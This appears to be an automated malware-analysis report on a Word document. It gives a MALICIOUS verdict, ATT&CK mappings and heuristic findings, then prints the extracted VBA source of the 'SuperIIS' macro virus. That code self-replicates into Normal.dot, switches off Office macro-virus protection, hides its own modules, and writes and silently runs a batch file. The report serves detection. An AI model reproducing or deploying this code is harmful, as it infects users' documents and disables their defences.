Verdict: MALICIOUS
Risk Score: 296
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The AutoOpen macro triggers the StealthDoc subroutine, which attempts to remove specific VBA components from both the Normal template and the active document. This self-cleaning behavior suggests an attempt to evade detection. The presence of AutoOpen and Auto_Close macros, along with Shell() calls, indicates a malicious intent to execute code, likely to download and run a secondary payload.
Heuristics 8
- ClamAV: Doc.Trojan.IIS-19 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.IIS-19
- VBA macros detected (medium, 5 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA
  Matched line in script: a = Shell(windir & "\system\lo.bat", 0)
- VBA macro-virus self-replication / AV tampering (critical, OLE_VBA_MACRO_VIRUS_REPLICATION): VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
  Matched line in script: NormalTemplate.VBProject.VBComponents(1).CodeModule.deleteLines 1, x
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro
  Matched line in script: Sub AutoOpen()
- Auto_Close macro (low, OLE_VBA_AUTOCLOSE): Auto_Close macro
  Matched line in script: If ii = 186 Then FullCode = FullCode & "Sub AutoClose" & Chr(13)
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS): OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 44885 bytes |

SHA-256: 1b1b97c99f56fd02019e4ca8538aadf9e35a16d93af268ad4fa0c508d8cd58f6

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Modul1" Sub AutoOpen() On Error GoTo eb 'MyName=SuperIIS Call MakeView eb: End Sub Sub StealthDoc() On Error GoTo eb 'Clean NormalTemplate: ms = NormalTemplate.VBProject.VBComponents.Count For i = 1 To ms a = NormalTemplate.VBProject.VBComponents.Item(i).CodeModule.countofLines If a > 1 Then f = NormalTemplate.VBProject.VBComponents.Item(i).CodeModule.lines(1, 1) If UCase(f) = "SUB VIEWVBCODE()" Then Exit For Next i If UCase(f) = "SUB VIEWVBCODE()" Then a = NormalTemplate.VBProject.VBComponents(i).Name Application.OrganizerDelete Source:=NormalTemplate.FullName, Name:=a, Object:=wdOrganizerObjectProjectItems End If For n = 1 To ms a = NormalTemplate.VBProject.VBComponents.Item(n).CodeModule.countofLines If a > 1 Then f = NormalTemplate.VBProject.VBComponents.Item(n).CodeModule.lines(3, 1) If UCase(f) = "'MYNAME=SUPERIIS" Then Exit For Next n If UCase(f) = "'MYNAME=SUPERIIS" Then a = NormalTemplate.VBProject.VBComponents(n).Name Application.OrganizerDelete Source:=NormalTemplate.FullName, Name:=a, Object:=wdOrganizerObjectProjectItems End If f = "" 'Clean Document: f = "" ms = ActiveDocument.VBProject.VBComponents.Count For ii = 1 To ms a = ActiveDocument.VBProject.VBComponents.Item(ii).CodeModule.countofLines If a > 1 Then f = ActiveDocument.VBProject.VBComponents.Item(ii).CodeModule.lines(1, 1) If UCase(f) = "SUB VIEWVBCODE()" Then Exit For Next ii If UCase(f) = "SUB VIEWVBCODE()" Then a = ActiveDocument.VBProject.VBComponents(ii).Name Application.OrganizerDelete Source:=ActiveDocument.FullName, Name:=a, Object:=wdOrganizerObjectProjectItems End If For fg = 1 To ms f = "" a = ActiveDocument.VBProject.VBComponents.Item(fg).CodeModule.countofLines If a > 1 Then f = 
ActiveDocument.VBProject.VBComponents.Item(fg).CodeModule.lines(3, 1) If UCase(f) = "'MYNAME=SUPERIIS" Then Exit For Next fg If UCase(f) = "'MYNAME=SUPERIIS" Then a = ActiveDocument.VBProject.VBComponents(fg).Name Application.OrganizerDelete Source:=ActiveDocument.FullName, Name:=a, Object:=wdOrganizerObjectProjectItems End If esub: Close Open "c:\msdos.sys" For Input As #1 Do Until EOF(1) Line Input #1, a If Left(UCase(a), 7) = "WINDIR=" Then l = Len(a) windir = Mid(a, 8, l) End If Loop x = NormalTemplate.VBProject.VBComponents(1).CodeModule.countofLines Close Open "c:\lo.sys" For Append As #1 Print #1, "Attribute VB_Name = " & Chr(34) & "Modul1" & Chr(34) Close NormalTemplate.VBProject.VBComponents.Import "c:\lo.sys" NormalTemplate.VBProject.VBComponents(1).CodeModule.deleteLines 1, x NormalTemplate.VBProject.VBComponents(1).CodeModule.InsertLines 1, "Private Sub ToolsMacro()" NormalTemplate.VBProject.VBComponents(1).CodeModule.InsertLines 2, "Application.dialogs (wddialogtoolsmacro).show" NormalTemplate.VBProject.VBComponents(1).CodeModule.InsertLines 3, "End Sub" ShowVisualBasicEditor = True If windir = "" Then Exit Sub a = Shell(windir & "\system\lo.bat", 0) eb: End Sub Sub MacroSDoc() On Error GoTo eb 'Clean NormalTemplate: ms = NormalTemplate.VBProject.VBComponents.Count For i = 1 To ms a = NormalTemplate.VBProject.VBComponents.Item(i).CodeModule.countofLines If a > 1 Then f = NormalTemplate.VBProject.VBComponents.Item(i).CodeModule.lines(1, 1) If UCase(f) = "SUB VIEWVBCODE()" Then Exit For Next i If UCase(f) = "SUB VIEWVBCODE()" Then a = NormalTemplate.VBProject.VBComponents(i).Name Application.OrganizerDelete Source:=NormalTemplate.FullName, Name:=a, Object:=wdOrganizerObjectProjectItems End If For n = 1 To ms a = NormalTemplate.VBProject.VBComponents.Item(n).CodeModule.countofLines If a > 1 Then f = NormalTemplate.VBProject.VBComponents.Item(n).CodeModule.lines(3, 1) If UCase(f) = "'MYNAME=SUPERIIS" Then Exit For Next n If UCase(f) = "'MYNAME=SUPERIIS" 
Then a = NormalTemplate.VBProject.VBComponents(n).Name Application.OrganizerDelete Source:=NormalTemplate.FullName, Name:=a, Object:=wdOrganizerObjectProjectItems End If f = "" 'Clean Document: f = "" ms = ActiveDocument.VBProject.VBComponents.Count For ii = 1 To ms a = ActiveDocument.VBProject.VBComponents.Item(ii).CodeModule.countofLines If a > 1 Then f = ActiveDocument.VBProject.VBComponents.Item(ii).CodeModule.lines(1, 1) If UCase(f) = "SUB VIEWVBCODE()" Then Exit For Next ii If UCase(f) = "SUB VIEWVBCODE()" Then a = ActiveDocument.VBProject.VBComponents(ii).Name Application.OrganizerDelete Source:=ActiveDocument.FullName, Name:=a, Object:=wdOrganizerObjectProjectItems End If For fg = 1 To ms f = "" a = ActiveDocument.VBProject.VBComponents.Item(fg).CodeModule.countofLines If a > 1 Then f = ActiveDocument.VBProject.VBComponents.Item(fg).CodeModule.lines(3, 1) If UCase(f) = "'MYNAME=SUPERIIS" Then Exit For Next fg If UCase(f) = "'MYNAME=SUPERIIS" Then a = ActiveDocument.VBProject.VBComponents(fg).Name Application.OrganizerDelete Source:=ActiveDocument.FullName, Name:=a, Object:=wdOrganizerObjectProjectItems End If esub: Close Open "c:\msdos.sys" For Input As #1 Do Until EOF(1) Line Input #1, a If Left(UCase(a), 7) = "WINDIR=" Then l = Len(a) windir = Mid(a, 8, l) End If Loop If windir = "" Then Exit Sub a = Shell(windir & "\system\lo.bat", 0) x = NormalTemplate.VBProject.VBComponents(1).CodeModule.countofLines Close Open "c:\lo.sys" For Append As #1 Print #1, "Attribute VB_Name = " & Chr(34) & "Modul1" & Chr(34) Close NormalTemplate.VBProject.VBComponents.Import "c:\lo.sys" NormalTemplate.VBProject.VBComponents(1).CodeModule.deleteLines 1, x NormalTemplate.VBProject.VBComponents(1).CodeModule.InsertLines 1, "Private Sub ToolsMacro()" NormalTemplate.VBProject.VBComponents(1).CodeModule.InsertLines 2, "Application.dialogs (wddialogtoolsmacro).show" NormalTemplate.VBProject.VBComponents(1).CodeModule.InsertLines 3, "End Sub" eb: End Sub Private Sub MakeView() On 
Error GoTo eb StealthCode = "Sub ViewVbCode()" & Chr(13) StealthCode = StealthCode & "Call Stealth" & Chr(13) StealthCode = StealthCode & "end sub" & Chr(13) StealthCode = StealthCode & "sub ToolsMacro" & Chr(13) StealthCode = StealthCode & "Call MacroS" & Chr(13) StealthCode = StealthCode & "End Sub" & Chr(13) ms = NormalTemplate.VBProject.VBComponents.Count For i = 1 To ms a = NormalTemplate.VBProject.VBComponents.Item(i).CodeModule.countofLines If a > 1 Then f = NormalTemplate.VBProject.VBComponents.Item(i).CodeModule.lines(1, 1) If UCase(f) = "SUB VIEWVBCODE()" Then Exit For Next i If UCase(f) = "SUB VIEWVBCODE()" Then NormalTemplate.VBProject.VBComponents.Item(i).CodeModule.deleteLines 1, a NormalTemplate.VBProject.VBComponents.Item(i).CodeModule.AddFromString (StealthCode) Else Close Open "c:\msdos.sys" For Input As #1 Do Until EOF(1) Line Input #1, a If Left(UCase(a), 7) = "WINDIR=" Then l = Len(a) windir = Mid(a, 8, l) End If Loop If windir = "" Then Exit Sub Close gg = Dir(windir & "\system\losys.exe") If gg <> "" Then Kill windir & "\system\losys.exe" Open windir & "\System\losys.exe" For Append As #1 Print #1, "Attribute VB_Name = " & Chr(34) & "Modul1" & Chr(34) Print #1, StealthCode Close NormalTemplate.VBProject.VBComponents.Import windir & "\System\losys.exe" End If Call FileClose eb: End Sub Sub FileClose() On Error GoTo eb Options.VirusProtection = False Options.ConfirmConversions = False Options.SaveNormalPrompt = False Close Open "c:\msdos.sys" For Input As #1 Do Until EOF(1) Line Input #1, a If Left(UCase(a), 7) = "WINDIR=" Then l = Len(a) windir = Mid(a, 8, l) End If Loop If windir = "" Then Exit Sub On Error GoTo NoInf a = ActiveDocument.VBProject.VBComponents.Count For i = 1 To a ls = ActiveDocument.VBProject.VBComponents(i).CodeModule.countofLines If ls > 1 Then l = ActiveDocument.VBProject.VBComponents(i).CodeModule.lines(3, 1) If UCase(l) = "'MYNAME=SUPERIIS" Then acd = 1 Exit For End If Next i If acd = 1 Then FullCode = "Sub AutoExec" & 
Chr(13) a = ActiveDocument.VBProject.VBComponents.Item(i).CodeModule.countofLines For ii = 2 To a If ii = 7 Then GoTo no2 If ii = 77 Then GoTo no2 If ii = 186 Then GoTo no2 If ii = 183 Then GoTo no2 l = ActiveDocument.VBProject.VBComponents.Item(i).CodeModule.lines(ii, 1) FullCode = FullCode & l & Chr(13) no2: If ii = 7 Then FullCode = FullCode & "Sub Stealth" & Chr(13) If ii = 77 Then FullCode = FullCode & "Sub MacroS" & Chr(13) If ii = 186 Then FullCode = FullCode & "Sub AutoClose" & Chr(13) If ii = 183 Then FullCode = FullCode & "Call AutoClose" & Chr(13) Next ii End If a = NormalTemplate.VBProject.VBComponents.Count For iii = 1 To a ls = NormalTemplate.VBProject.VBComponents(iii).CodeModule.countofLines If ls > 1 Then l = NormalTemplate.VBProject.VBComponents(iii).CodeModule.lines(3, 1) If UCase(l) = "'MYNAME=SUPERIIS" Then NormT = 1 Exit For End If Next iii If NormT = 1 Then FullCode = "Sub AutoOpen" & Chr(13) a = NormalTemplate.VBProject.VBComponents.Item(iii).CodeModule.countofLines For iiii = 2 To a If iiii = 7 Then GoTo non2 If iiii = 77 Then GoTo non2 If iiii = 186 Then GoTo non2 If iiii = 183 Then GoTo non2 l = NormalTemplate.VBProject.VBComponents.Item(iii).CodeModule.lines(iiii, 1) FullCode = FullCode & l & Chr(13) non2: If iiii = 7 Then FullCode = FullCode & "Sub StealthDoc" & Chr(13) If iiii = 77 Then FullCode = FullCode & "Sub MacroSDoc" & Chr(13) If iiii = 186 Then FullCode = FullCode & "Sub FileClose" & Chr(13) If iiii = 183 Then FullCode = FullCode & "Call FileClose" & Chr(13) Next iiii End If If NormT <> 1 Then a = Dir(windir & "\System\lo.sys") If a <> "" Then Kill windir & "\System\lo.sys" Application.NormalTemplate.OpenAsDocument Close d = Dir(windir & "\System\vmm64.vxd") If d <> "" Then Kill windir & "\System\vmm64.vxd" Open windir & "\System\Vmm64.vxd" For Append As #1 Print #1, "Attribute VB_Name = " & Chr(34) & "Modul1" & Chr(34) Print #1, FullCode Close ActiveDocument.VBProject.VBComponents.Import windir & "\System\Vmm64.VXD" 
ActiveDocument.SaveAs FileName:=windir & "\System\lo.sys", FileFormat:=wdFormatTemplate, AddToRecentFiles:=False, ReadOnlyRecommended:=False ActiveDocument.Save ActiveDocument.Close a = Dir(windir & "\System\lo.bat") If a <> "" Then Kill windir & "\System\lo.bat" Close Open windir & "\System\lo.bat" For Append As #1 Print #1, ":Begin" l = Len(NormalTemplate.FullName) l = l - 10 Print #1, "If not exist " & Left(NormalTemplate.FullName, l) & "~$Normal.dot goto start" Print #1, "Goto Begin" Print #1, ":Start" Print #1, windir & "\command\Attrib.exe -s -h -r " & NormalTemplate.FullName Print #1, "Copy/y " & windir & "\System\lo.sys " & NormalTemplate.FullName Print #1, windir & "\command\Attrib.exe -s -h -r " & NormalTemplate.FullName Print #1, "Copy/y " & windir & "\System\lo.sys " & NormalTemplate.FullName Print #1, windir & "\command\Attrib.exe -s -h -r " & NormalTemplate.FullName Print #1, "Copy/y " & windir & "\System\lo.sys " & NormalTemplate.FullName Close a = Shell(windir & "\System\lo.bat", 0) End If If acd <> 1 Then Close d = Dir(windir & "\System\vmm64.vxd") If d <> "" Then Kill windir & "\System\vmm64.vxd" Open windir & "\System\Vmm64.vxd" For Append As #1 Print #1, "Attribute VB_Name = " & Chr(34) & "Modul1" & Chr(34) Print #1, FullCode Close ActiveDocument.VBProject.VBComponents.Import windir & "\System\Vmm64.VXD" If UCase(Left(ActiveDocument.FullName, 1)) <> "A" And Mid(ActiveDocument.FullName, 3, 1) = "\" Then ActiveDocument.Save End If NoInf: eb: End Sub …